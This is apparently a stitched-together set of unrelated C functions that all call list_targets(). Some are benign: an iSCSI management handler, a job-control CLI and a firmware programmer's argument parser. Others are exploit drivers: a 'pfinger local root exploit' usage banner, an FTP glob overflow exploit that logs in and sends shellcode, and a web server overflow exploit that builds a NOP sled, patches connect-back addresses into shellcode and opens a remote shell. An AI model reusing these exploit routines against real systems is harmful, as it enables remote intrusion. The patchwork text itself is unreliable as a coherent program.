/*ARGSUSED*/ void list_func(xml_node_t *p, target_queue_t *reply, target_queue_t *mgmt) { xml_node_t *x; char msgbuf[80], *reply_msg = NULL; if (p->x_child == NULL) { xml_rtn_msg(&reply_msg, ERR_SYNTAX_MISSING_OBJECT); } else { x = p->x_child; if (x->x_name == NULL) { xml_rtn_msg(&reply_msg, ERR_SYNTAX_MISSING_OBJECT); } else if (strcmp(x->x_name, XML_ELEMENT_TARG) == 0) { reply_msg = list_targets(x); } else if (strcmp(x->x_name, XML_ELEMENT_INIT) == 0) { reply_msg = list_initiator(x); } else if (strcmp(x->x_name, XML_ELEMENT_TPGT) == 0) { reply_msg = list_tpgt(x); } else if (strcmp(x->x_name, XML_ELEMENT_ADMIN) == 0) { reply_msg = list_admin(x); } else { (void) snprintf(msgbuf, sizeof (msgbuf), "Unknown object '%s' for list element", x->x_name); xml_rtn_msg(&reply_msg, ERR_INVALID_OBJECT); } } queue_message_set(reply, 0, msg_mgmt_rply, reply_msg); }
int main(int argc, char** argv) { const char* command = "list"; bool verbose = false; int c; while ((c = getopt_long(argc, argv, "+hv", kLongOptions, NULL)) != -1) { switch (c) { case 0: break; case 'h': usage(0); break; case 'v': verbose = true; break; default: usage(1); break; } } if (argc - optind >= 1) command = argv[optind]; if (strcmp(command, "list") == 0) { list_jobs(verbose); } else if (strcmp(command, "list-targets") == 0) { list_targets(verbose); } else if (strcmp(command, "log") == 0) { get_log(argc - optind, &argv[optind]); } else if (argc == optind + 1) { // For convenience (the "info" command can be omitted) get_info(command); } else { // All commands that need a name following const char* name = argv[argc - 1]; if (strcmp(command, "info") == 0) { get_info(name); } else if (strcmp(command, "start") == 0) { start_job(name); } else if (strcmp(command, "stop") == 0) { stop_job(name); } else if (strcmp(command, "restart") == 0) { restart_job(name); } else if (strcmp(command, "enable") == 0) { enable_job(name, true); } else if (strcmp(command, "disable") == 0) { enable_job(name, false); } else { fprintf(stderr, "%s: Unknown command \"%s\".\n", kProgramName, command); } } return 0; }
void ussage (char *argv) { printf ("%s - pfinger local root, user, whatever exploit\n", argv); printf ("written by dvdman\n\n"); printf ("Ussage %s <target type> \ntargets avalible:\n\n"); list_targets (); exit(0); }
int32_t parse_arguments( struct programmer_arguments *args, const size_t argc, char **argv ) { int32_t i; int32_t status = 0; if( NULL == args ) return -1; /* initialize the argument block to empty, known values */ args->target = tar_none; args->command = com_none; args->quiet = 0; args->suppressbootloader = 0; /* Special case - check for the help commands which do not require a device type */ if( argc == 2 ) { if( 0 == strcasecmp(argv[1], "--version") ) { fprintf( stderr, PACKAGE_STRING "\n"); return 1; } if( 0 == strcasecmp(argv[1], "--targets") ) { list_targets( LIST_STD ); return 1; } if( 0 == strcasecmp(argv[1], "--targets-tex") ) { list_targets( LIST_TEX ); return 1; } if( 0 == strcasecmp(argv[1], "--targets-html") ) { list_targets( LIST_HTML ); return 1; } if( 0 == strcasecmp(argv[1], "--help") || 0 == strcasecmp(argv[1], "-h") || 0 == strcasecmp(argv[1], "--h") ) { usage(); return 1; } } /* Make sure there are the minimum arguments */ if( argc < 3 ) { basic_help(); return -1; } if( 0 != assign_target(args, argv[1], target_map) ) { fprintf( stderr, "Unsupported target '%s'.\n", argv[1]); status = -3; goto done; } if( 0 != assign_option((int32_t *) &(args->command), argv[2], command_map) ) { status = -4; goto done; } /* These were taken care of above. */ *argv[0] = '\0'; *argv[1] = '\0'; *argv[2] = '\0'; /* assign command specific default values */ switch( args->command ) { case com_flash : args->com_flash_data.force = 0; args->com_flash_data.segment = mem_flash; break; case com_launch : args->com_launch_config.noreset = 0; break; case com_dump : args->com_read_data.segment = mem_flash; args->com_flash_data.force = 0; break; case com_bin2hex : args->com_convert_data.segment = mem_flash; break; default : break; } if( 0 != assign_global_options(args, argc, argv) ) { status = -5; goto done; } if( 0 != assign_command_options(args, argc, argv) ) { status = -6; goto done; } /* Make sure there weren't any *extra* options. */ for( i = 0; i < argc; i++ ) { if( '\0' != *argv[i] ) { fprintf( stderr, "unrecognized parameter\n" ); status = -7; goto done; } } /* if this is a flash command, restore the filename */ if( (com_flash == args->command) || (com_eflash == args->command) || (com_user == args->command) ) { if( 0 == args->com_flash_data.file ) { // TODO : it should be ok to not have a filename if --serial=hexdigits:offset is // provided, this should be implemented.. in fact, given that most of this // program is written to use a single command by it self, this probably should // be separated out as a new command. The caveat is if data is written to '\0' // in the hex file, serialize will do nothing bc can't unwrite w/o erase fprintf( stderr, "flash filename is missing\n" ); status = -8; goto done; } args->com_flash_data.file[0] = args->com_flash_data.original_first_char; } if( (com_bin2hex == args->command) || (com_hex2bin == args->command) ) { if( 0 == args->com_convert_data.file ) { fprintf( stderr, "conversion filename is missing\n" ); status = -8; goto done; } args->com_convert_data.file[0] = args->com_convert_data.original_first_char; } done: if( 1 < debug ) { print_args( args ); } if(-3 == status ) { list_targets( LIST_STD ); } else if( 0 != status ) { usage(); } return status; }
int main(int argc, char **argv) { int sock, c; int port = FTP_PORT; int debuglevel = 0; char *host = NULL; char *username = NULL; char *password = NULL; struct arch *arch = NULL; char *shellcode = bsdcode; int target = 0; int sleep_time = 0; unsigned long code_addr = 0; char *homedir = NULL;; /* grab command line parameters */ while((c = getopt(argc, argv, "c:o:u:p:it:d:l:v:s:h")) != EOF) { switch(c) { case 'c': host = Strdup(optarg); break; case 'o': port = atoi(optarg); break; case 'u': username = Strdup(optarg); break; case 'p': password = Strdup(optarg); /* hide the password from ps */ memset(optarg, 'X', strlen(optarg)); break; case 'i': password = getpass("Enter remote password: "******"list") == 0) { list_targets(); return EXIT_FAILURE; } target = atoi(optarg); arch = &(archlist[target]); code_addr = ntohl(arch->code_addr); shellcode = arch->shellcode; break; case 'd': homedir = Strdup(optarg); break; case 'l': code_addr = ntohl(strtoul(optarg, NULL, 0)); break; case 'v': debuglevel = atoi(optarg); break; case 's': sleep_time = atoi(optarg); break; default: usage(argv[0]); break; } } /* check for required options */ if(host == NULL || username == NULL || password == NULL || code_addr == 0) usage(argv[0]); /* setup the debug level */ switch(debuglevel) { case 1: debug_read = 1; debug_write = 0; break; case 2: debug_read = 1; debug_write = 1; break; default: debug_read = 0; debug_write = 0; break; } /* make sure the shellcode is good */ if(!verify_shellcode(shellcode)) return EXIT_FAILURE; /* initiate the tcp connection to the ftp server */ if((sock = tcp_connect(host, port)) == -1) { fprintf(stderr, "[-] Connection to %s failed!\n", host); ftp_quit(sock); return EXIT_FAILURE; } if(arch == NULL) printf("[0] Connected to host %s.\n", host); else printf("[0] Connected to host %s\n\tusing type:\t%s.\n", host, arch->description); /* login */ if(!ftp_login(sock, username, password)) { fprintf(stderr, "[-] Login failed, aborting!\n"); ftp_quit(sock); return EXIT_FAILURE; } /* hey, so im anal! */ memset(password, 'X', strlen(password)); memset(username, 'X', strlen(username)); printf("[1] Login succeeded.\n"); if(sleep != 0) sleep(sleep_time); if(homedir == NULL) { /* get home directory */ if((homedir = ftp_gethomedir(sock)) == NULL) { fprintf(stderr, "[-] Couldn't retrieve home directory, aborting!\n"); ftp_quit(sock); return EXIT_FAILURE; } } printf("[2] Home directory retrieved as \"%s\", %u bytes.\n", homedir, strlen(homedir)); /* do the exploitation */ if(!ftp_glob_exploit(sock, homedir, code_addr, shellcode)) { fprintf(stderr, "[-] exploit failed, aborting!\n"); ftp_quit(sock); return EXIT_FAILURE; } free(host); return EXIT_SUCCESS; }
int main(int argc, char **argv, char **env) { if(argc<=1) usage(argv[0]); fputc('\n', stderr); while((ch=getopt(argc,argv,"t:s:p:a:l:i:r:xeb:vh"))!=EOF) switch (ch) { case 't': { i = atoi(optarg); if(!i) list_targets(), exit(0); else i--; target = tlist[i].type; addr = tlist[i].ret_addr; bsize = tlist[i].bsize; retfill = tlist[i].retfill; if(strstr(tlist[i].type, "1.3")) ver=3; if(strstr(tlist[i].type, "1.4")) ver=4; } break; case 's': { i = atoi(optarg); shelltype = slist[i].shelltype; shellcode = slist[i].shellcode; shellport = slist[i].shellport; backport = slist[i].backport; } break; case 'p': strncpy(path, optarg, sizeof(path)); break; case 'a': addr = strtoul(optarg, NULL, 0); break; case 'l': rlen = atoi(optarg); break; case 'i': bsize = atoi(optarg); break; case 'r': retfill = atoi(optarg); break; case 'v': verbose++; break; case 'x': test_shellcode(); break; case 'e': exploit++; break; case 'b': { strncpy(cmd, optarg, sizeof(cmd)); for(i = 0; i < strlen(cmd); i++) if(cmd[i] == '.') cmd[i] = ' '; sscanf(cmd, "%d %d %d %d", &a, &b, &c, &d); if(!a||!b||!c||!d) log("0 in the ip. pls use another\n"), exit(0); if(!shellcode) log("use -s option before -b\n"), exit(0); if(shellcode==x86_bsd_connback) shellcode[24] = (char ) a, shellcode[25] = (char ) b, shellcode[26] = (char ) c, shellcode[27] = (char ) d, memcpy(&back, shellcode+24, 4); if(shellcode==x86_linux_connback) shellcode[12+33] = (char ) a, shellcode[12+34] = (char ) b, shellcode[12+35] = (char ) c, shellcode[12+36] = (char ) d, memcpy(&back, shellcode+12+33, 4); } break; case 'h': default: usage(argv[0]); break; } dest=argv[argc - 1]; ptr=strchr(dest,':'); if(ptr!=NULL) { ptr[0]='\0'; ptr++; port=atoi(ptr);} log("start attack: (1.%d) %s\n\n", ver, target); log("connecting to %s %d ... ", dest, port); if(connectm(dest, port, &t)) exit(0); log("building query ...\n"); if(ver>3) { sprintf(cmd, "Host: %s\n", dest); target=strdup(cmd); } else target=strdup(""); sprintf(cmd, "GET %s HTTP/1.0\n" "%s" "Accept: text/html, text/plain\n" "Accept: application/postscript, text/sgml, */*;q=0.01\n" "Accept-Encoding: gzip, compress\n" "Accept-Language: en\n" "Negotiate: trans\n" "User-Agent: Lynx/6.6.6\n" "\n", path, target); log("sending query (%d) ... ", strlen(cmd)); if(verbose) log("send>\n%s\n<send\n", cmd); writem(); perror(NULL); log("receiving data ...\n"); recvall(rlen); close(t); if(srvok) exit(0); if(!m302ok) log("url path not redirected. use -p to override\n"), exit(0); if(!rlen) log("rlen auto detection fail. use -l to override\n"), exit(0); if(rlen % 2) log("alignment error (rlen: %d). not exploitable.\n", rlen), exit(0); log("addr: 0x%x\n", (unsigned int) addr); log("rlen: %d\n", rlen); log("offset: %d\n", offset); addr += rlen + offset; log("use addr: 0x%x (addr + rlen + offset)\n", (unsigned int) addr); bsize-=rlen; bsize-=retfill; bsize/=2; log("buffer size: %d ((bsize-rlen-retfill)/2)\n", bsize); log("retfill: %d\n", retfill); log("shellcode len: %d\n\n", strlen(shellcode)); if(!exploit) log("all seems ok. run again with -e option\n"), exit(0); if(backport) { if(!back) log("no connect back ip. use -b option\n"), exit(0); log("connect back to: 0x%08x %d\n", (unsigned long) back, backport); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); s.sin_family = AF_INET; s.sin_port = htons(backport); s.sin_addr.s_addr = htonl(INADDR_ANY); debug("... bind", bind(sock, (struct sockaddr *)&s, sizeof(s))); debug("... listen", listen(sock, 5)); } starttime = time(NULL); setjmp(w); log("ready in %d sec...\r", starttime + TIMEOUT - time(NULL)); if(starttime + TIMEOUT >= time(NULL)) longjmp(w, 1); log("connecting to %s %d ... ", dest, port); if(connectm(dest, port, &t)) exit(0); log("building data ...\n"); buff = (char *)malloc(bsize+retfill*4+100); memset(buff, 0x00, bsize+retfill*4+100); for(i=0; i<bsize; i++) buff[i] = 0x90; ptr=buff+((bsize)-(strlen(shellcode))); for(i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i]; addr_ptr = (long *)ptr; for(i=0; i<retfill; i+=4) *(addr_ptr++)=addr; log("building query + data ...\n"); sprintf(cmd, "GET %s%s HTTP/1.0\n" "%s" "Accept: text/html, text/plain\n" "Accept: application/postscript, text/sgml, */*;q=0.01\n" "Accept-Encoding: gzip, compress\n" "Accept-Language: en\n" "Negotiate: trans\n" "User-Agent: Lynx/6.6.6\n" "\n", path, buff, target); log("sending query + data (all: %d) (buff: %d) ... ", strlen(cmd), strlen(buff)); if(verbose) log("send>\n%s\n<send\n", cmd); writem(); perror(NULL); log("shell ...\n"); if(shellport) { log("connecting to %s %d ... ", dest, shellport); sleep(1); if(connectm(dest, shellport, &sock)) exit(0); } if(backport) { debug("... accept", sock = accept(sock, (struct sockaddr *)&s, &l)); } signal(2, sigh); shell(); CLOSE(t); CLOSE(sock); FREE(target); log("done.\n"); return 0; }
int32_t parse_arguments( struct programmer_arguments *args, const size_t argc, char **argv ) { int32_t i; int32_t status = 0; if( NULL == args ) return -1; /* initialize the argument block to empty, known values */ args->target = tar_none; args->command = com_none; args->quiet = 0; args->suppressbootloader = 0; /* Special case - check for the help commands which do not require a device type */ if( argc == 2 ) { if( 0 == strcasecmp(argv[1], "--version") ) { fprintf( stderr, PACKAGE_STRING "\n"); return -1; } if( 0 == strcasecmp(argv[1], "--targets") ) { list_targets(); return -1; } if( 0 == strcasecmp(argv[1], "--help") ) { usage(); return -1; } } /* Make sure there are the minimum arguments */ if( argc < 3 ) { basic_help(); return -1; } if( 0 != assign_target(args, argv[1], target_map) ) { fprintf( stderr, "Unsupported target '%s'.\n", argv[1]); status = -3; goto done; } if( 0 != assign_option((int32_t *) &(args->command), argv[2], command_map) ) { status = -4; goto done; } /* These were taken care of above. */ *argv[0] = '\0'; *argv[1] = '\0'; *argv[2] = '\0'; if( 0 != assign_global_options(args, argc, argv) ) { status = -5; goto done; } if( 0 != assign_command_options(args, argc, argv) ) { status = -6; goto done; } /* Make sure there weren't any *extra* options. */ for( i = 0; i < argc; i++ ) { if( '\0' != *argv[i] ) { fprintf( stderr, "unrecognized parameter\n" ); status = -7; goto done; } } /* if this is a flash command, restore the filename */ if( (com_flash == args->command) || (com_eflash == args->command) || (com_user == args->command) ) { if( 0 == args->com_flash_data.file ) { fprintf( stderr, "flash filename is missing\n" ); status = -8; goto done; } args->com_flash_data.file[0] = args->com_flash_data.original_first_char; } done: if( 1 < debug ) { print_args( args ); } if(-3 == status ) { list_targets(); } else if( 0 != status ) { usage(); } return status; }